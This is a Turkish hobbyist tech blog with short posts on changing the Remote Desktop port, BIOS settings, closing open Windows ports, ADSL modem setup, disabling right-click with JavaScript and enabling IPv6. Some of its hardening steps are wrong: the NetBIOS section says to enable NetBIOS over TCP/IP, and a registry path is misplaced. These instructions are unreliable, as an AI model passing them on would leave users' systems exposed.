Murat TATAR God saves lost souls , I save lost passwords

4Nis/110

Remote Desktop change port – Uzak masaüstü portu degiştirme

Standart olan uzak masa üstü bağlantı noktası portu 3389 dur bunu değiştirmek için aşağıda verildiği şekilde değişikliği yaparak istediğiniz bir port ile değiştirebilirsiniz.

1. Kayıt Defteri Düzenleyicisi'ni başlatın.
2. Aşağıdaki kayıt defteri alt anahtarını bulup tıklatın:
HKEY_LOCAL_MACHINESystemCurrentControlSetControlTerminalServerWinStationsRDP-TcpPortNumber
3. Düzen menüsünde, Değiştir'i ve sonra da Ondalık'ı tıklatın.
4. Yeni bağlantı noktası numarasını yazın ve Tamam'ı tıklatın.
5. Kayıt Defteri Düzenleyicisi'nden çıkın.

4Nis/110

Bios’a dair ayarlar bilgiler

Bilgisayarınızda hangi işletim sistemi yüklü olursa olsun, aslında arka planda çalışmakta olan bir işletim sistemi daha var. Mavi ekran vermeden, göçmeden, cihaz sürücüsü istemeden sessiz sedasız işini yapan bu alçak gönüllü işletim sisteminin, bilinen adı ile BIOS’un ne olduğunu gelin birlikte öğrenelim

Bilgisayarın ayrılmaz bir parçası olduğu halde, hep arka planda kalan, acemileri “aman kurcalama, bozarsın” diye korkuttuğumuz şu BIOS, aslında o kadar da karmaşık bir şey değil. Üstelik, bir kere BIOS’a hakim oldunuz mu, sisteminize ince ayar çekmek yada sorun gidermek için yapabilecekleriniz de fazlasıyla artıyor.

BIOS kelimesi bir kısaltma, uzun hali ise Basic Input/Output System, yani Temel Giriş/Çıkış Sistemi. Temelde BIOS bir program, ama bilgisayarımıza yükleyip çalıştırdığımız diğer programlardan yerleştiği yer ve işlevleri açısından farklı.

Öncelikle, BIOS sisteminizin ayrılmaz bir parçası, sisteminizi kapatsanız da, diskinizi formatlasanız da BIOS yerli yerinde duruyor. Bunun nedeni de, BIOS’un diskte değil, anakart üzerine monte edilmiş, salt okunabilir bir ROM bellek yongasında kayıtlı olması. Sadece okunabilir desek de, BIOS’un kayıtlı olduğu yongaya yeni bir BIOS yüklemek mümkün, ama bu konudan daha sonra bahsedeceğiz.

BIOS yazılımı, diğer yazılımlarınızın aksine dilerseniz vazgeçebileceğiniz bir opsiyon değil, sistem çalıştığı anda çalışmaya başlayan, sistemin temel bir yapı taşı. Dahası, BIOS tam olarak sisteminize göre ayarlanmış bir yazılım, bu nedenle de her anakartın BIOS’u kendine özel.

En yeni, en modern PC’lerdeki BIOS’lar bile aslında çok eski yazılımlar. BIOS’un çekirdek fonksiyonları 1981’de çıkmış olan IBM PC’ye dayanıyor ve bu fonksiyonlar halen değişmiyor, sisteminiz ne kadar yeni olursa olsun.

BIOS’un büyük kısmı, sisteminizi ilk açtığınızda çalışır, görevini tamamlar ve işletim sisteminiz görevi devraldığında BIOS sessizce kenara çekilir. Buna rağmen görevi bitmiş sayılmaz, çünkü sistemin çok derinlerindeki kimi işlevler ve enerji tasarruf fonksiyonları hala BIOS’un sorumluluğundadır. Sisteminizde bir sorun çıkmadığında, yada yeni taktığınız bir donanım, başka bir donanım ile çakışmadıkça BIOS’un arka planda çalıştığını farketmezsiniz bile.

Bir kullanıcı olarak BIOS’un sizi en çok ilgilendirecek kısmı, aslında normalde BIOS’un bir fonksiyonu olarak da düşünülmemiş olan System Setup, yani Sistem Ayarları kısmıdır. Bir çok ekrandan oluşan bu ayar sisteminde, sisteminizin bir çok parçasına erişebilir, işlemci ve bellek hızından, modeminizin kullandığı IRQ’ya kadar her detaya hükmedebilirsiniz.

Bu yazıda hem BIOS’un nasıl çalıştığından bahsedeceğiz, hem de Setup ekranının bazı merak edilen ama pek bilinmeyen seçeneklerinin ne işe yaradıklarını göreceğiz.

BIOS Nasıl Çalışır?

İlk olarak tasarlandığında BIOS’un 4 fonksiyonu vardı: Sisteminiz her açıldığında, temel bir donanım kontrolü yaparak bir arıza olup olmadığını tespit etmek (Power On Self Test – POST), sistem çalıştıktan sonra RAM belleği devamlı olarak tazelemek (bu, artık yonga seti tarafından gerçekleştiriliyor).

Diğer iki temel fonksiyondan biri, sistem açıldığında bazı ufak RAM bloklarını rezerve edip, bu bloklara sisteminiz hakkında bilgiler yazmak. Bunun amacı da, yazılımlarınızın sisteminizdeki donanımlar hakkında bilgi sahibi olabilmesi, örneğin bir yazılımın, bellekteki belli bir alana bakarak kaç GB’lık bir disk kullandığınızı ve kaç tane diskinizin olduğunu anlayabilmesi. Bu bloklara BIOS Data Area deniyor.

Temel BIOS işlevlerinden sonuncusu ise, yazılımlarınızın donanımınız ile iletişebilmesini sağlamak, böylece adını aldığı işlemi, temel giriş/çıkış işlevlerini gerçekleştirmek.

Günümüzde, gelişmiş işletim sistemleri BIOS’un yaptığı bir çok işi üzerlerine almış durumdalar. BIOS hala var ve temel işlemler için gerekli, ama işletim sistemleri çoğu BIOS parametresini de es geçebiliyorlar. Örneğin, BIOS’un Setup ekranına girip, sisteme takılı disklerinizden birisini devre dışı bıraksanız da, Windows’a girdiğinizde diskin yerli yerinde olduğunu görebiliyorsunuz.

Sistem Açılırken

BIOS’un ilk işlevi, sistemin açılmasını sağlamak. Eğer işlemcinize bir şeyler yapmasını söylemezseniz, anakartınızın üzerine kendi başına, bir şey yapmadan çalışıp duracaktır. Oysa BIOS, işlemcinize ilk temel komutları vererek, sistemin açılış sürecini başlatır. POST işlemi tamamlandıktan sonra da kontrolü diğer programlara bırakır. Bu sayede PC’lerimizin evrensel olması sağlanır, yani işletim sistemine özel BIOS’a gerek kalmaz. BIOS işini yapıp kontrolü devreder, ondan sonra işi ister Windows XP devralır, ister Linux, ister BeOS.

Şu CMOS Denilen Şey?

Bazı yerlerde “CMOS Setup” yada “CMOS’u sıfırladım” gibi ifadeler okumuş, duymuş olabilirsiniz. BIOS derken şimdi nereden çıktı bu CMOS, gelin bakalım.

Biraz önce söylediğimiz gibi, BIOS, sadece okunabilir bir ROM bellek yongasında kayıtlıdır. Bu durumda, BIOS’da yaptığınız ayarları kaydetmek için bir yer gerekiyor tabii ki. İşte CMOS burada devreye giriyor. CMOS, uzun ismi Complimentary Metal Oxide Semiconductor olan bir bellek çeşidi. BIOS’un ayar ekranlarına girip yaptığınız değişiklikler, bu CMOS yongasına kaydediliyor. Sistem kapatıldığında yonganın içindeki bilgiler kaybolmasın diye de anakartınızın üzerinde bir pil var, bu pil CMOS yongasını yıllarca besleyebiliyor. Hani bazen kullanıcıların “BIOS, yaptığım sistem ayarlarını kaydetmiyor, sistem her açıldığında ayarlar sıfırlanıyor” şikayetlerini duyarsınız. İşte bu şikayetlerin nedeni ya CMOS’un arızalı olması, yada pilin bitmiş olması nedeni ile içine kaydedilen bilgileri unutması.

BIOS’u sıfırlamak

Kimi zaman kullanıcılara BIOS Setup’da yanlış bir ayar yaparlar ve sistemleri açılmaz olur. İşte o zaman “BIOS’u sıfırla” diye akıl veririz. Aslında önerdiğimiz şey BIOS’un sıfırlanması değil, bunu yapabilseydik sistemimiz çalışmaz olurdu. Burada kastedilen şey, BIOS ayarlarının kaydedildiği, az önce tanıttığımız CMOS’un içerdiği verileri sıfırlamak, sistemin varsayılan ayarlar ile açılmasını sağlamak.

Güncel anakartların üzerinde “CMOS Clear” yada “CLR RTC” gibi etiketlenmiş bir köprü bulunur, bu köprü genelde BIOS’un kayıtlı olduğu Flash ROM yongasının yakınındadır. Bu köprünün yerini bulmanın en kolay ve garantili yolu, anakartınızın kitapçığına başvurmaktır. Bu köprüyü kapattığınızda, yani jumper dediğimiz ufak parça yada bir tornavida ucu yardımızla içi ucu birleştirdiğinizde, CMOS’da kayıtlı tüm bilgiler gider, sisteme yaptığınız bütün ince ayarlar sıfırlanır.

BIOS’a Erişim

BIOS’un sahip olduğu sistem ayar ekranlarına erişimin en yaygın yolu, sisteminiz açılırken DEL tuşuna basmak. Zaten sisteminiz açılırken beliren “Press DEL to enter Setup” yazısı mutlaka gözünüze takılmıştır, işte o yazı size BIOS’a girişin yolunu gösteriyor. Kimi anakartlarda Setup ekranına ulaşmak için DEL tuşu yerine ESC, F1 yada F2 tuşlarına basıldığı da oluyor, ama en yaygın yöntem DEL tuşuna basmak.

Bazı Gizemli BIOS Ayarları

BIOS’un System Setup ekranlarında bütün ayarları bu kısıtlı sayfalarda aktarmak mümkün değil. Biz bütün ayarları sıralamak yerine, çok sık rastlanan, ama ne işe yaradıkları tam bilinmeyen, üzerlerinde bazı efsaneler dolaşan bazı gizemli ayarlardan bahsetmek, onların ne işe yaradıklarını anlatmayı tercih ediyoruz.

AGP Aperture Size: BIOS ayarlarının en çok tartışılanlarından biridir AGP Aperture Size. Çoğu zaman, performansa büyük etkisi olduğu yolunda yada belleği tükettiği yönünde yanlış inanışlar vardır. Oysa durum böyle değil. AGP sistemi sayesinde, ekran kartınız, sistem belleğinizin bir kısmını sanki kendi üzerindeki bellekmiş gibi kullanabilir. İşte AGP Aperture Size, ekran kartının sistem belleğinin ne kadarını kendisi için kullanabileceğini belirliyor. Yanlış anlamayın, burada belirlenen bir limit, yani bu miktarda belleği direkt olarak bloke etmiyorsunuz. Ekran kartı, bu miktara kadar olan bellek alanına gerek duyarsa ulaşabileceğini anlıyor bu limit sayesinde. Örneğin ekran kartınızda 64MB bellek var, Aperture Size olarak da 64MB seçerseniz, uygulamalar sistemde toplam 128MB grafik belleği olduğunu düşünüyorlar. AGP Aperture Size’ın performansa etkisi olduğu iddia edilsede, bu etki günümüz uygulamalarında ciddi düzeyde değildir. Tek dikkat edeceğiniz şey, miktarını ekran kartınızın RAM miktarından az, sisteminizdeki bellek miktarından ise fazla tutmayın.

AGP Driving Control: Özellikle AMD işlemciler için tasarlanmış anakartlarda çok rastlanan bir ayardır. Bu ayar üzerinde de efsaneler dolaşır, kullanıcılara “filanca değere getirirseniz daha iyi olur” gibi asılsız tavsiyelerde bulunulur. Oysa gerçekte, ekran kartınızı çalıştırmakta bir sorun yaşamadığınız sürece bu değerle oynamanıza gerek yoktur.

Power On After AC Failure: Bazı kullanıcılarımız “sabah kalktım ki sistem kendi kendine açılmış, nasıl olur” diye sorularlar. Bu işin sırrı işte bu seçenekte gizli. İsminin “PWR On After PWR Loss” gibi çeşitli varyasyonları olabilen bu seçenek, sistemin bağlı olduğu şehir elektriği kesilir, sonra yine gelirse sistemin kendi kendine çalışmaya başlayıp başlamamasını ayarlar. Eğer bu seçeneği “On” yada “Enabled” yaparsanız, elektrik kesilip tekrar geldiğinde sistem kendi kendine açılır, siz de sistemi çalışır durumda bulursunuz. Yeni anakartlarda bu madde için bir de "Previous State" seçeneği var. Bunu seçerseniz, elektrik kesildiğinde sistem çalışıyorsa, elektrik geldiğinde yeniden çalışmaya başlar, kesinti olduğunda sistem kapalıysa, elektrik geldiğinde de kapalı kalır.

Floppy Mode 3 Support: Her BIOS’da bulunan, ama ne işe yaradığını kimsenin bilmediği bir seçenektir. Bu özellik, sadece Japonya’da yaygın olan, 1.2MB’lık bir 3.5” disket formatını desteklemekte kullanılır. Bizler için hiç bir önemi ve anlamı yok.

VGA Palette Snooping: Her BIOS’da olan, ama ne işe yaradığı bilinmeyen bir diğer ayar. Sadece çok eski video yakalama (capture) ve MPEG oynatma kartları tarafından kullanılır ve bu kartların, ekran görüntüsünü yakalamasını sağlar. “Disable” durumda bırakın, çünkü günümüzde hiç bir anlamı yok.

Virus Warning: Çoğu BIOS’da rastladığımız bu seçenek, sanıldığının aksine bir dahili virüs koruması değil. Evet, bu seçeneği aktifleştirdiğinizde bir uygulama sabit diskinizin boot sektörüne yada partiton tablosuna yazmaya kalkıştığında anakartınız alarm verir, ama bu her zaman virüs demek değildir. Örneğin, bu seçenek aktif olduğunda Windows kurmaya çalıştığınızda da virüs uyarısı alırsınız. Windows 95 ilk çıktığında yayılan “bu işletim sistemi virüslü, kurmaya kalktım sistem alarm verdi” efsanesi işte buradan çıkmıştı. Sanıldığının aksine, sisteminizin genelini virüslere karşı korumak gibi bir özelliği de yoktur, dolayısıyla bu seçeneği aktif hale getirip, sisteminizi virüslere karşı tamamiyle güvende zannetmeyin.

Paralel Port Mode: Yazıcınızı ve tarayıcınızı bağladığınız paralel port (LPT diye geçer) için bu ayar yine her BIOS’da bulunur. Standart, ECP ve EPP seçeneklerini görebilirsiniz. Standart, en eski haliyle, tek yönlü paralel bağlantıdır, sadece PC yazıcıya veri gönderebilir, yazıcı PC’ye veri yollayamaz. Günümüz yazıcılarından çoğu bu ayar ile çalışmaz “Bidirectional Connection Required” uyarısı ile iki yönlü iletişim yapabilecek bir paralel porta ihtiyaç duyduklarını belirtirler. Bu gerekliliği, ayarı ECP yada EPP seçeneklerinden birisine getirerek karşılayabilirsiniz, ECP’ye getirmeniz önerilir. EPP, Enhanced Paralel Port demektir ve Intel, Xircom, Zenith gibi firmalar tarafından oluşturulmuş bir standarttır. ECP, Extended Capabilities Port demektir, Microsoft ve HP tarafından yaratılmıştır. Her iki sistem de paralel port bağlantısını hızlandırmayı hedefler. ECP portu yazıcı ve tarayıcılar için, EPP ise paralel portu kullanan yazıcı dışındaki araçlar için uygundur. ECP modu, DMA ve tampon bellek gibi avantajlara sahiptir.

Gate A20 Option: İşte PC’nin çok eski zamanlarından günümüze gelen bir seçenek. Temel olarak klavye kontrolcüsü ile ilgilidir, varsayılan ayardan farklı bir değere getirmeniz gerekmez.

CPU L2 Cache ECC Check: ECC, bellek hatalarını belirleyip, düzeltmeye yarayan bir sistemdir. Bu seçeneği aktif hale getirmeniz, işlemcinin kullandığı Level 2 tampon belleğin ECC fonksiyonuna sahip olup olmamasını belirler. Güncel işlemciler L2 cache belleklerini işlemcinin içinde taşıdıkları için bu ayarın anlamı kalmıyor. Bu ayar daha çok L2 tampon belleğin işlemci çekirdeğinin dışında olduğu sistemler için geçerli. Aktif hale geldiğinde, performansa çok ufak miktarda olumsuz etkisi olacaktır.

Swap Floppy Drive: Eğer iki disket sürücünüz varsa, bu seçenek ile A: olarak görünenin B:, B: olarak görünenin ise A: olarak görünmesini sağlayabilirsiniz. Bu seçeneği olmayan BIOS’larda aynı işi yapmak için sistemi söküp, sürücülerin kablolarını değiştirmeniz gerekecektir.

Typematic Ayarları: Her BIOS’da bulunan tarihi ayarlardan birisi de bu seçenekler. Klavyede bir tuşa basılı tuttuğunuzda, tuşun kaç saniye sonra devamlı basılı kaldığının anlaşılacağını, basılı kalan tuşun ardı ardına karakter basarken saniyede kaç karakter basacağını bu ayar belirler. Güncel sistemlerde genelde devre dışıdır, bizim önerimiz de varsayılan değerlerde bırakmanız.

Report No FDD for Win95: Windows 95’in kötü bir huyu vardır, sisteminizde disket sürücü olmasa bile varmış gibi davranıp sorun yaratabilir. Eğer sisteminizde disket sürücü yoksa ve Windows 95 kullanıyorsanız, bu ayarı aktif hale getirin, sorunlar çözülsün. Aksi halde varsayılan değerinde bırakın.

Memory Hole at 15M-16M: Yine her BIOS’da bulunan ve temelleri çok eskiye dayanan bir seçenek. Kimi eski ISA kartların taşıdıkları BIOS’lar (Evet, ek donanımların kendi BIOS’ları da olabilir) sistem belleğinin 15MB ile 16MB’ları arasındaki bir bölüme yerleşirler. Eğer böyle bir kartınız varsa, çalışabilmesi için bu seçeneği “Enabled” yapmalısınız. Günümüzde bu durumu gerektirecek bir donanım yok denebilir.

USB Keyboard Support: Ülkemizde hala yaygın değiller ama sisteme USB üzerinden bağlanan klavyeler dünyada var. Bu ayarın “OS” ve “BIOS” gibi iki seçeneği vardır. Eğer bir USB klavyeniz varsa ve bu klavyeyi DOS gibi işletim sistemlerinde de kullanmak istiyorsanız, bu seçeneği BIOS yapmalısınız. Aksi halde, örneğin bir BIOS güncellemesi için sistemi disketten açtığınızda klavyeniz çalışmaz.

Force Update ESCD: ESCD, Extended System Configuration Data kelimelerinin baş harflerinden oluşan bir kısaltmadır. Tak-Çalıştır (Plug ‘n Play) sistemi ile bağlantılı olan bu birim, sistem kaynaklarının çeşitli donanımlar arasında dağılımını düzenler. Sisteminize yeni bir kart taktığınızda, bu seçeneği aktif hale getirip sisteminizi yeniden başlatmanız, yeni kartın sistem tarafından tanınmasını kolaylaştırabilir. Bu seçenek işlevini tamamladıktan sonra yine devre dışı hale gelir.

PCI Latency Timer: Bu değer, bir PCI kartın, PCI veriyolunu ne kadar süreyle meşgul edebileceğini belirler. Çok yükseltmeniz yada çok azaltmanız sorun yaratacaktır, genelde varsayılan değer olan 32’de bırakın.

VGA use IRQ ve USB use IRQ: Bu seçenekler ekran kartınızın ve USB kontrolcünüzün bir sistem kesmesi (IRQ) kullanıp kullanmayacağını belirler. Güncel bir ekran kartınız varsa “VGA use IRQ” seçeneğini mutlaka onaylamalısınız. Eğer sisteminizde hiç bir USB cihaz kullanmıyorsanız, “USB use IRQ” seçeneğini kapatabilirsiniz.

Boot Other Devices: Yeni anakartlarda, sistemin sıra ile hangi araçlardan açılabileceğini seçtiğimiz kısımda, bir de bu seçenek var. Anlamı ise, sistemin eğer belirttiğimiz cihazlardan açılamazsa, başka cihazlara da erişip erişmeyeceğini belirlemek. Örneğin siz sistemin açılacağı cihazları sırasıyla Hard Disk, CD-ROM ve SCSI olarak seçtiyseniz ve bu seçeneği de aktif hale getirdiyseniz, sistem bu cihazlardan boot edemezse, bu sefer disket sürücüyü de kontrol edecektir.

Delay IDE Init: Bazı eski sabit disklerin, çalışmaya başlamarı ile kullanıma hazır olmaları arasında belli bir süre gerekmektedir. Eğer bu kadar antika bir diskiniz varsa, diskinizin hazır olması için gereken süreyi buradan ayarlayabilirsiniz. Sistem, açılmadan önce diskinizin kullanıma hazır hale gelmesini bekleyecektir.

Run VGABIOS if S3 Resume: Sadece çok yeni anakartlarda gördüğümüz bu seçenek, Suspend-to-RAM (STR) moduna girdikten sonra kendine gelemeyen ekran kartınızı, yeniden çalışmaya ikna etmenizi sağlar. Eğer sisteminiz bekleme (stand-by) durumuna geçtikten sonra, yeniden sistemi kullanmak istediğinizde bütün cihazlar çalışmaya başlıyor ama monitöre görüntü bir türlü gelmiyorsa, bu seçeneği aktif hale getirin.

2Nis/110

Acik Portlari Kapatma Yontemleri

Port Güvenlik

Eğer açık portunuz var ise bu portların bilgisayar içinde hangi servisleri veya programları kullandığını ögrenerek bunları kapatabilirsiniz.

* Bu servisleri Bilgisayarımın Yönet / Hizmetler bölümünden yapabilirsiniz. (Windows Güvenlik bölümünde anlatılmıştır )

1. Microsoft-ds (445) Port Güvenlik

Bilgisayarım 'ı tıklayın ve açın adres çubuğuna ipadresinizi yazın. Entera bastıktan sonra sayfanın açılmasını bekleyin.

Örnek : 123.123.123.123 Ip adresiniz ögrenmek için www.whatismyip.com

* Şifre penceresi açılırsa kendi belirlediğiniz şifre geçerli olur ve Microsoft-ds (445) portu şifreli olarak korumalıdır.
* Yazdığınız sayfaya ulaşılamıyor gibi bir mesaj gelirse Microsoft-ds (445) portunuz kapalı ve korumalıdır.
* Yazdığınız adres Şifresiz ve direkt olarak açılırsa tehlikelidir ve Microsoft-ds (445) portunu kapatmalısınız.

Microsoft-DS ( 445 ) Windows işletim sistemlerinin güvenliği için önemli bir porttur.Açık olması demek Internette bulunan saldırganların bu port üzerinden bilgisayarınıza her türlü zararı vermesi demektir.

Bu portu kapatmak için yapmanız gerekenler

* Başlat / Çalıştır / kutu içine cmd yazarak Dos penceresini açalım netstat - an komutunu yazarak Entera basalım 445 portunun olup olmadığına bakalım.Var ise aşagıdakileri uygulayabiliriz.

Başlat / Çalıştır / kutu içine regedit.exe yazın

Açılan Kayıt Defteri Düzenleyicisinde Sol taraftaki menüden sırasıyla aşağıdakileri bulup uygulayın.

* HKEY_LOCAL_MACHINE ( yanındaki "+" işaretini tıklayın ve açılan menüden aşagıdakini bulun)

* Software ( Yukarıdaki gibi aynı işlemi tekrarlayın )

* Microsoft ( Yukarıdaki gibi aynı işlemi tekrarlayın )

* Services ( Yukarıdaki gibi aynı işlemi tekrarlayın )

* NeTBT ( Yukarıdaki gibi aynı işlemi tekrarlayın )

* Parameters (En son olarak bu kutucugun üzerini tıklayarak sağ tarafta bu kutuyla alakalı özelliklerin açılmasını sağlayalım)

* Sağ tarafta açılan kutu içinde en altta bulunan " TransportBindName " isimli özelliğin üzerine tıklayarak küçük ayar penceresinin açılmasını sağlayalım.

* Değer verisi yazan yerde Device yazmaktadır. Bu veriyi silerek kutuyu boş bırakalım.Tamam diyerek işlemimizi bitirelim.

* Kayıt Düzenleyici Defteri Penceresini kapatarak Bilgisayarmızı yeniden başlatalım böylelikle ayarlar kayıt edilmiş ve uygulanmış olucaktır.

* Başlat / Çalıştır / kutu içine cmd yazarak Dos penceresini açalım netstat - an komutunu yazarak Entera basalım 445 portunun olmadığını görebiliriz.

2. NETBIOS ( 137, 138, 139 ) Port Güvenlik

* Başlat / Çalıştır / cmd komutunu yazarak Enter'a basın

* Açılan Dos penceresinde netstat -an yazıp Entera basın

* Yerel adres bölümünde veya Yabancı adres bölümünde 137, 138, 139 portlarını görüyorsanız bu portları şu şekilde engellemeniz mümkün

* Bilgisayarımı aç / Ağ bağlantılarım / Ağ bağlantılarımı görüntüle / Kurmuş olduğunuz Modem bağlantısının özelliklerini açın

* Yerel Ağ bağlantısı Özellikleri penceresinin orta bölümünde bulunan "Internet Iletişim Kuralları ( TCP/IP) yazan yeri çift tıklayarak açın

* Gelişmiş seçeneğinden WINS bölümüne geçin

* En alta bölümde NETBIOS ayarı yazar.Burada "TCP/IP üzerinde NETBIOS ' u etkileştir" seçeneğini seçerek Tamam ' ı tıklayıp işlemi bitirin.

* Bilgisayarını ve modemini yeniden başlatarak ayarların kayıt edilmesini sağlayabilirsiniz.

* Tekrar Dos penceresine giderek netstat -an yazıp sonuca bakın portların kapandığını görüceksiniz.

3. DCOM, RPC ( 135 ) Port Güvenlik

* Başlat / Çalıştır / regedt32 yaz.

* Açılan "Kayıt Defteri Düzenleyicisinde" sol taraftaki menüden "HKEY_LOCAL_MACHINE" yanındaki "+"işaretini tıkla.

* Açılan menüden Software Microsoft OLE yolunu takip et "Ole" üzerine tıkladığında yan sayfada "EnableDCOM" görüceksin üzerine tıkla ve aç değer verisi bölümüne büyük harf ile N harfini gir. Tamam de pencereyi kapat.Eğer aynı bölümde "EnableRemoteConnect" diye bir seçenek yoksa boşluğa sağ tıkla Yeni / Dize Değeri oluştur oluşan dize değerinin ismini EnableRemoteConnect olarak değiştir.Üzerine tıkla ve değer verisi olarak büyük harf ile N yaz.Tamam diyerek pencereyi kapat.

* Software Microsoft RPC yolu üzerinden Rpc yi tıkla.Sağ tarafta bulunan pencereden "DCom Protocols" değer adının üzerine tıkla ve aç.İçinde bulunan değer verisi isimlerinden sadece ncacn_ip_tcp olanı sil. Tamam diyerek pencereyi kapat.

* Kayıt düzenleyiciyi kapatarak ayarların etkin olması için Bilgisayarı yeniden başlatın.

* Başlat / Çalıştır / cmd yazıp dos penceresinde netstat -an yazdığınızda çıkan sonuçta 135 numaralı portun kapanmış olduğunu görüceksiniz.

3. Ftp (21) Port Güvenlik

Internet Explorer açın ve adres çubuğuna ftp://Ipadresiniz yazın. Entera bastıktan sonra sayfanın açılmasını bekleyin.

Örnek : ftp://123.123.123.123 Ip adresinizi ögrenmek için www.whatismyip.com
* Şifre penceresi açılırsa kendi belirlediğiniz şifre geçerli olur ve Ftp (21) portu şifreli olarak korumalıdır..
* Yazdığınız sayfaya ulaşılamıyor gibi bir mesaj gelirse Ftp (21) portunuz kapalı ve korumalıdır.
* Yazdığınız adres Şifresiz ve direkt olarak açılırsa tehlikelidir ve Ftp (21) portunu kapatmalısınız.

4. Telnet (23) Port Güvenlik

Başlat Menüsünden Çalıştır ' ı açın ve cmd yazın.

Açılan Dos penceresine

telnet ipadresiniz yazarak Entera basın.

Örnek : telnet 123.123.123.123

* Dos penceresinde sizden giriş için Şifre isterse kendi belirlediğiniz şifre geçerli olur ve Telnet (23) portu şifreli olarak korumalıdır..
* Yazdığınız adrese veya bağlantıya ulaşılamıyor gibi bir mesaj gelirse Telnet (23) portunuz kapalı ve korumalıdır.
* Yazdığınız adres Şifresiz ve direkt olarak açılırsa tehlikelidir ve Telnet (23) portunu kapatmalısınız.

2Nis/110

ADSL Modem Kurulum Ayarlari

ADSL Modem Kurulum Ayarları

WAN Ayarları
VPI = 8
VCI = 35
Service Category = UBR Without PCR
Connection Type = PPP over ATM (PPPoA) VC/MUX veya PPP over Ethernet (PPPoE) LLC Encapsulation.
PPP Username = Kullanıcı Adı
PPP Password = Şifre

Network Address Translation Settings
Enable NAT = Seçili
Enable Firewall = Seçili
Enable IGMP Multicast = Seçili
Enable Wan Service = Seçili

Local Area Network (LAN Setup)
IP Address = 192.168.1.1
Subnet Mask = 255.255.255.0
DHCP Server on the LAN = Seçili olsun IP nizi otomatik alın.
DHCP için ayarlar.
Start IP Address = 192.168.1.2
End IP Address = 192.168.1.X (X değeri ağdaki makina sayısına göre 2 ile 255 arası değiştirilebilir.)
İsterseniz ki tahminim yoktur ikinci bir IP ve Alt Ağ makesi, makina sayınız
250 yi geçiyor ise atayabilirsiniz.

NAT

Eğer bilgisayarınızda firewall a takılmadan erişim hakkı almanız veya vermeniz gerekiyorsa
NAT ile port trigerring yapabilirsiniz. Burada UDP TCP port acarak (Örneği e mule için) firewall u
devre dışı bırakabilirsiniz.

DMZ Host.

Buraya vereceğiniz IP adresi Firewall un etkisi altında kalmaz ve makinanız hertürlü erişime açık
olur. Bilmeyerek yaparsanız davetsiz misafirler sizi rahatsız edebilir.

Firewall Ayarları.

Eğer firewall un default ayarları haricinde port veya IP adresi banlamak istiyorsanız bu seçenekleri kullanabilirsiniz.
Bkz. Port Filter, Address Filter.

DNS

DNS i otomatik algılaması sizin için daha iyi olur. Ama illaki ben kendi DNS imi ben yazarım diyorsanız o başka.

Diagnostics.

Umarım modeminizde böyle bir tool vardır.

Test your Ethernet Connection: Ethernet ile modem bağlantısını kontrol eder.

Test your USB Connection: USB ile modem bağlantınızı kontrol eder.

Test ADSL Synchronization: Hatınızda ADSL sinyali olup olmadığını kontrol eder.

Test ATM OAM F5 segment ping: ADSL modeminizin ADSL ağı ile bağlı olup olmadığını gösterir

Test ATM OAM F5 end-to-end ping: ADSL modeminizin ADSL ağı ile bağlı olup olmadığını gösterir

Test PPP server session: Noktadan noktaya iletişimi destekler.

Test authentication with ISP: Kullanıcı Adı ve Şifrenizi doğrular.

Test the assigned IP address: Sze verilen Statik veya Dinamik IP adresini doğrular.

Ping default gateway: Varsayılan Ağ Geçidinizi doğrular.

Ping primary Domain Name Server: Birincil DNS nizi doğrular.

Modem Işıkları Ne Anlama Gelir.

Power: Güç Ledidir. Yanmıyorsa fişi takmayı unutmuşsunuzdur.

Status: Durum Ledi. Yanıyorsa ADSL bağlantınız sağlanmıştır. Yanıp sönüyorsa bağlanmaya çaılışıyordur.
Tamamen sönükse bağlantı yoktur.

Line: Hat Ledi.Yanmıyorsa veri akışı yok demektir. Yanıp sönüyor veya sürekli yanıyorsa veri akışı vardır.

PC : PC ile modem arasındaki veri akışını ve bağlantıyı gösterir.

USB : PC ile modem arasındaki USB bağlantının aktif olup olmadığını gösterir.

2Nis/110

Sitenize sag tus&kopyalama yasagi koymanin yolu

Sağ tuş yasağı için header adlı templatenin en altına eklenmesi gereken kod aşagıdaki gibidir;

kod:

<SCRIPT language=Javascript1.2>  
<!--  
// please keep these lines on when you copy the source  
// made by: AlPeReN - http://kalmania.net  
var mymessage = " Sağ Tuş İşlemez :) ";  
function rtclickcheck(keyp){  
if (navigator.appName == "Netscape" && keyp.which == 3) {  
alert(mymessage);  
return false;  
}  
if (navigator.appVersion.indexOf("MSIE") != -1 && event.button == 2) {  
alert(mymessage);  
return false;  
}  
}  
document.onmousedown = rtclickcheck  
//-->  
</SCRIPT>

Mause ile seçmeyi engellemek için header adlı templatenin en altına eklenmesi gereken kod aşagıdaki gibidir;
kod:

<script type="text/javascript"> 
//form tags to omit in NS6+: 
var omitformtags=["input", "textarea", "select"] 
omitformtags=omitformtags.join("|") 
function disableselect(e){ 
if (omitformtags.indexOf(e.target.tagName.toLowerCase())==-1) 
return false 
} 
function reEnable(){ 
return true 
} 
if (typeof document.onselectstart!="undefined") 
document.onselectstart=new Function ("return false") 
else{ 
document.onmousedown=disableselect 
document.onmouseup=reEnable 
} 
</script> 

2Nis/110

İpv6 Ya Gecis Komutları

Yeni Nesil Tcp İp Denklemi Olan İpv6 Ya İşletim Sisteminizdeki Ethernet Bağdaştırıcısını Geçirmek İçin Aşagıdaki Adımları İzlemeniz Gerekecektir

Start > Run > Cmd > Netsh Enter > Netsh>İnterface İpv6 Enter > İnstall Enter

Devamında Netsh İnterface İpv6>İnstall
Ok. Bu Cıktıyı Alıyor Olacagız Şimdi İse Start > Run > Cmd > İpconfig /All Dediğimizde

192.168.1.3
255.255.255.0
Fe80::20A:E6ff:Fe9a:5De1%5
192.168.1.1
192.168.1.1
192.168.1.1
Fec0:0:0:Ffff::1%1
Fec0:0:0:Ffff::2%1
Fec0:0:0:Ffff::3%1

Hem 32 Bit Lik İp Adresimiz Alt Kısmında İse Yeni Nesil İpv6 Ya Uyumlu İp Adreslerimiz Gozukecektir İyi Çalışmalar

1Nis/110

En Sik Gorulen 15 Guvenlik Saldirisi

Verizon güvenlik uzmanlarının en son Veri Sızma Araştırma Raporu en sık rastlanan 15 güvenlik saldırısını listeliyor.

rapor en sık rastlanan saldırıları derecelendirip profilini çıkarıyor. Her bir saldırı tipi için gerçek dünya senaryoları, uyarı işaretleri, saldırının nasıl yapıldığı, saldırganların nasıl girdiği, hangi bilgileri aldıkları, hangi mülkleri hedefledikleri, en çok etkilenen endüstriler ve hangi önlemlerin etkili olduğu gibi bilgiler veriliyor. Raporda güvenlik tehditlerini tespit ve karşı koymak için toplam olarak 150 yöntem detaylandırmış.

En Sık Rastlanan 15 Güvenlik Saldırısı
